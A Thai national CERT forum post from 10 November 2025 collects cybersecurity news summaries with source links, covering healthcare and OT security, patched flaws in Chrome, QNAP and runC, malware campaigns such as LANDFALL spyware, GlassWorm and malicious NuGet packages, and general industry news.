NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ

    Cyber Threat Intelligence 10 November 2025

    Cyber Security News
    1
    1
    279
    โหลดโพสเพิ่มเติม
    • เก่าสุดไปยังใหม่สุด
    • ใหม่สุดไปยังเก่าสุด
    • Most Votes
    ตอบ
    • ตอบโดยตั้งกระทู้ใหม่
    เข้าสู่ระบบเพื่อตอบกลับ
    Topic นี้ถูกลบไปแล้ว เฉพาะผู้ใช้งานที่มีสิทธิ์ในการจัดการ Topic เท่านั้นที่จะมีสิทธิ์ในการเข้าชม
    • NCSA_THAICERTN
      NCSA_THAICERT
      แก้ไขล่าสุดโดย

      Healthcare Sector

      • Hospitals Are Running Out Of Excuses For Weak Cyber Hygiene
        "Healthcare leaders continue to treat cybersecurity as a technical safeguard instead of a strategic business function, according to the 2025 US Healthcare Cyber Resilience Survey by EY. The study, based on responses from 100 healthcare executives, outlines six areas where hospitals and health systems must act to close resilience gaps that threaten patient care and operations."
        https://www.helpnetsecurity.com/2025/11/07/ey-healthcare-risk-management-report/

      Industrial Sector

      • For OT Cyber Defenders, Lack Of Data Is The Biggest Threat
        "For those charged with the cyber defense of operational technology and industrial control systems, one challenge towers above all others: Data. Specifically, its scarcity. There's little hard data available about real life cyberattacks against OT and ICS. Most operators simply don't capture it, in stark contrast with their IT counterparts. Corporate victims of an IT attack typically call in a forensic analyst to comb through the logs and telemetry to spot how hackers broke in. Incident responders "run their tools on your systems. They can pull the data up," said Rob Lee CEO of OT cybersecurity leader Dragos."
        https://www.bankinfosecurity.com/for-ot-cyber-defenders-lack-data-biggest-threat-a-29959

      Vulnerabilities

      • Chrome 142 Update Patches High-Severity Flaws
        "Shortly after promoting Chrome 142 to the stable channel, Google pushed out an update to address five vulnerabilities in the browser, including three high-severity flaws. The first high-risk issue is CVE-2025-12725 (CVSS score of 8.8), described as an out-of-bounds write bug in Chrome’s WebGPU graphics API, which delivers high-performance visuals by allowing websites to interact with the system’s GPU. Out-of-bounds defects are rooted in insufficient bounds checking, which allows attackers to write data outside of the intended memory space, potentially leading to crashes or arbitrary code execution."
        https://www.securityweek.com/chrome-142-update-patches-high-severity-flaws/
      • QNAP Fixes Seven NAS Zero-Day Flaws Exploited At Pwn2Own
        "QNAP has fixed seven zero-day vulnerabilities that security researchers exploited to hack QNAP network-attached storage (NAS) devices during the Pwn2Own Ireland 2025 competition. The flaws impact QNAP's QTS and QuTS hero operating systems (CVE-2025-62847, CVE-2025-62848, CVE-2025-62849) and the company's Hyper Data Protector (CVE-2025-59389), Malware Remover (CVE-2025-11837), and HBS 3 Hybrid Backup Sync (CVE-2025-62840, CVE-2025-62842) software. QNAP said in advisories published on Friday that the security bugs were demonstrated at Pwn2Own by the Summoning Team, DEVCORE, Team DDOS, and a CyCraft technology intern."
        https://www.bleepingcomputer.com/news/security/qnap-fixes-seven-nas-zero-day-vulnerabilities-exploited-at-pwn2own/
        https://www.qnap.com/en/security-advisory/qsa-25-45
        https://securityaffairs.com/184396/hacking/qnap-fixed-multiple-zero-days-in-its-software-demonstrated-at-pwn2own-2025.html
      • Dangerous RunC Flaws Could Allow Hackers To Escape Docker Containers
        "Three newly disclosed vulnerabilities in the runC container runtime used in Docker and Kubernetes could be exploited to bypass isolation restrictions and get access to the host system. The security issues, tracked as CVE-2025-31133, CVE-2025-52565, and CVE-2025-52881 (all ), were reported this week and disclosed by SUSE software engineer and Open Container Initiative (OCI) board member Aleksa Sarai. runC is a universal container runtime and the OCI reference implementation for running containers. It is responsible for low-level operations such as creating the container process, setting up namespaces, mounts, and cgroups that higher-level tools, like Docker and Kubernetes, can call."
        https://www.bleepingcomputer.com/news/security/dangerous-runc-flaws-could-allow-hackers-to-escape-docker-containers/
        https://seclists.org/oss-sec/2025/q4/138

      Malware

      • 9 Malicious NuGet Packages Deliver Time-Delayed Destructive Payloads
        "Socket's Threat Research Team discovered nine malicious NuGet packages that inject time-delayed destructive payloads into database operations and target industrial control systems. Published under the NuGet alias shanhai666 between 2023 and 2024, these packages terminate the host application process with 20% probability on each database query after specific trigger dates in 2027 and 2028."
        https://socket.dev/blog/9-malicious-nuget-packages-deliver-time-delayed-destructive-payloads
        https://thehackernews.com/2025/11/hidden-logic-bombs-in-malware-laced.html
        https://www.bleepingcomputer.com/news/security/malicious-nuget-packages-drop-disruptive-time-bombs/
        https://www.theregister.com/2025/11/07/cybercriminals_plant_destructive_time_bomb/
      • LANDFALL: New Commercial-Grade Android Spyware In Exploit Chain Targeting Samsung Devices
        "Unit 42 researchers have uncovered a previously unknown Android spyware family, which we have named LANDFALL. To deliver the spyware, attackers exploited a zero-day vulnerability (CVE-2025-21042) in Samsung’s Android image processing library. The specific flaw LANDFALL exploited, CVE-2025-21042, is not an isolated case but rather part of a broader pattern of similar issues found on multiple mobile platforms."
        https://unit42.paloaltonetworks.com/landfall-is-new-commercial-grade-android-spyware/
        https://www.bleepingcomputer.com/news/security/new-landfall-spyware-exploited-samsung-zero-day-via-whatsapp-messages/
        https://therecord.media/landfall-spyware-middle-east-appears-commercial-grade
        https://www.darkreading.com/mobile-security/landfall-malware-targeted-samsung-galaxy-users
        https://thehackernews.com/2025/11/samsung-zero-click-flaw-exploited-to.html
        https://cyberscoop.com/landfall-spyware-samsung-phones-palo-alto-networks-unit-42/
        https://securityaffairs.com/184331/security/landfall-spyware-exploited-samsung-zero-day-cve-2025-21042-in-middle-east-attacks.html
        https://www.securityweek.com/landfall-android-spyware-targeted-samsung-phones-via-zero-day/
        https://www.theregister.com/2025/11/07/landfall_spyware_samsung_0days/
        https://www.bankinfosecurity.com/samsung-zero-day-flaw-exploited-by-landfall-spyware-a-29963
      • Swapzone “Profit Trick” Web-Inject: From Lure To Live DOM Hijack
        "At Bolster’s Threat Intelligence Lab, we recently investigated a compact but effective JavaScript-based scam abusing the trust in swapzone.io, a popular crypto-exchange aggregator. The attack trades on greed and curiosity: victims are promised a “0-day glitch” or “100% working profit trick” and instructed to paste a single javascript: snippet into their browser address bar."
        https://bolster.ai/blog/swapzone-profit-trick-web-inject-from-lure-to-live-dom-hijack
        https://hackread.com/fake-0-day-exploit-emails-crypto-malicious-code/
      • China-Linked Actors Maintain Focus On Organizations Influencing U.S. Policy
        "Recent compromise of a non-profit organization reflects continued interest in U.S. policy. The TTPs have previously been linked to multiple Chinese actors such as Kelp, Space Pirates, and APT41. APT41 is one of the longest-running Chinese espionage groups. Attackers were aiming to establish a persistent and stealthy presence on the network. They gained access for several weeks in April 2025."
        https://www.security.com/threat-intelligence/china-apt-us-policy
        https://thehackernews.com/2025/11/from-log4j-to-iis-chinas-hackers-turn.html
        https://securityaffairs.com/184351/apt/china-linked-hackers-target-u-s-non-profit-in-long-term-espionage-campaign.html
      • Tracking a Dragon: Investigating a DragonForce-Affiliated Ransomware Attack With Darktrace
        "DragonForce is a Ransomware-as-a-Service (RaaS) platform that emerged in late 2023, offering broad-scale capabilities and infrastructure to threat actors. Recently, DragonForce has been linked to attacks targeting the UK retail sector, resulting in several high-profile cases [1][2]. Moreover, the group launched an affiliate program offering a revenue share of roughly 20%, significantly lower than commissions reported across other RaaS platforms [3]."
        https://www.darktrace.com/blog/tracking-a-dragon-investigating-a-dragonforce-affiliated-ransomware-attack-with-darktrace
      • GlassWorm Returns: New Wave Strikes As We Expose Attacker Infrastructure
        "Almost three weeks ago, we disclosed GlassWorm - the first self-propagating worm targeting VS Code extensions, using invisible Unicode characters to hide malicious code that literally disappears from code editors. On October 21, 2025, OpenVSX declared the incident "fully contained and closed." But on November 6, 2025 - sixteen days later - we detected a new wave of GlassWorm infections. Three more extensions compromised. A fresh Solana blockchain transaction providing new C2 endpoints. Same attacker infrastructure, still fully operational."
        https://www.koi.ai/blog/glassworm-returns-new-wave-openvsx-malware-expose-attacker-infrastructure
        https://www.bleepingcomputer.com/news/security/glassworm-malware-returns-on-openvsx-with-3-new-vscode-extensions/
      • Nitrogen Ransomware: From Staged Loader To Full-Scale Extortion
        "The Nitrogen group is a sophisticated and financially motivated threat group that was first observed as a malware developer and operator in 2023. Since discovery, Nitrogen has transformed itself into a full end-to-end, double extortion ransomware operation. The location of the group, the identities/lineage of its members and relationships with other threat actors are not well documented."
        https://blog.barracuda.com/2025/11/07/nitrogen-ransomware--from-staged-loader-to-full-scale-extortion
      • Whisper Leak: A Novel Side-Channel Attack On Remote Language Models
        "Microsoft has discovered a new type of side-channel attack on remote language models. This type of side-channel attack could allow a cyberattacker a position to observe your network traffic to conclude language model conversation topics, despite being end-to-end encrypted via Transport Layer Security (TLS). We have worked with multiple vendors to get the risk mitigated, as well as made sure Microsoft-owned language model frameworks are protected."
        https://www.microsoft.com/en-us/security/blog/2025/11/07/whisper-leak-a-novel-side-channel-cyberattack-on-remote-language-models/
        https://thehackernews.com/2025/11/microsoft-uncovers-whisper-leak-attack.html
        https://securityaffairs.com/184372/hacking/ai-chat-privacy-at-risk-microsoft-details-whisper-leak-side-channel-attack.html
      • A New Italian Citizen Was Targeted With Paragon’s Graphite Spyware. We Have a Serious Problem
        "Italian political adviser Francesco Nicodemo said he was targeted with Paragon’s Graphite spyware, becoming the fifth Italian in the ongoing government surveillance activity. Graphite is an invasive, non-auditable spyware that covertly accesses sensitive phone data; experts say it violates human rights and should be banned. Nicodemo is among 90 victims notified by WhatsApp about evidence linking their devices to Paragon spyware, according to a senior forensic researcher at Citizenlab, John Scott-Railton."
        https://securityaffairs.com/184340/security/a-new-italian-citizen-was-targeted-with-paragons-graphite-spyware-we-have-a-serious-problem.html

      General News

      • Russian National Pleads Guilty To Breaking Into Networks For Yanluowang Ransomware Attacks
        "A 25-year-old Russian national pleaded guilty to multiple charges stemming from their participation in ransomware attacks and faces a maximum penalty up to 53 years in prison. Aleksei Olegovich Volkov, also known as “chubaka.kor,” served as the initial access broker for the Yanluowang ransomware group while living in Russia from July 2021 through November 2022, according to court records. Prosecutors accuse Volkov and unnamed co-conspirators of attacking seven U.S. businesses during that period, including two that paid a combined $1.5 million in ransoms."
        https://cyberscoop.com/russian-aleksei-volkov-yanluowang-ransomware/
      • AI Agents Are Going Rogue: Here's How To Rein Them In
        "Last July, a leading agentic software creation platform company called Replit held a 12-day "vibe coding" event that wound up triggering a coding freeze, which allowed rogue AI agents to wreak havoc, with one even deleting a live production database, erasing records for more than 1,200 executives and nearly 1,200 companies. Then the AI agent launched a cover-up."
        https://www.darkreading.com/cyber-risk/ai-agents-going-rogue
      • Metrics Don’t Lie, But They Can Be Misleading When They Only Tell IT’s Side Of The Story
        "In this Help Net Security interview, Rik Mistry, Managing Partner at Interval Group, discusses how to align IT strategy with business goals. He explains how security, governance, and orchestration shape IT operations and why early collaboration between IT and security leaders leads to better outcomes. Mistry also shares his perspective on automation and emerging technologies."
        https://www.helpnetsecurity.com/2025/11/07/rik-mistry-interval-group-it-security-metrics/
      • What Keeps Phishing Training From Fading Over Time
        "When employees stop falling for phishing emails, it is rarely luck. A new study shows that steady, mandatory phishing training can cut risky behavior over time. After one year of continuous simulations and follow-up lessons, employees were half as likely to take the bait. The research, carried out by teams from various universities, offers a look at how behavior changes when training never stops."
        https://www.helpnetsecurity.com/2025/11/07/research-phishing-training-effectiveness/
        https://arxiv.org/pdf/2510.27298
      • Old Privacy Laws Create New Risks For Businesses
        "Businesses are increasingly being pulled into lawsuits over how they collect and share user data online. What was once the domain of large tech firms is now a widespread legal risk for companies of all sizes. The latest analysis from cyber insurer Coalition shows that outdated privacy laws are driving a surge in web privacy claims, with small and midsize businesses now common targets."
        https://www.helpnetsecurity.com/2025/11/07/businesses-web-privacy-lawsuits/
      • Who's Watching The Watchers? This Mozilla Fellow, And Her Surveillance Watch Map
        "Digital rights activist Esra'a Al Shafei found FinFisher spyware on her device more than a decade ago. Now she's made it her mission to surveil the companies providing surveillanceware, their customers, and their funders. "You cannot resist what you do not know, and the more you know, the better you can protect yourself and resist against the normalization of mass surveillance today," she told The Register. To this end, the Mozilla fellow founded Surveillance Watch last year. It's an interactive map that documents the growing number of surveillance software providers, which regions use the various products, and the investors funding them. Since its launch, the project has grown from mapping connections between 220 spyware and surveillance entities to 695 today."
        https://www.theregister.com/2025/11/08/mozilla_fellow_al_shafei/

      อ้างอิง
      Electronic Transactions Development Agency (ETDA) 8347eeba-9e4f-44e2-817e-a4b9ca55c977-image.png

      1 การตอบกลับ คำตอบล่าสุด ตอบ คำอ้างอิง 0
      • First post
        Last post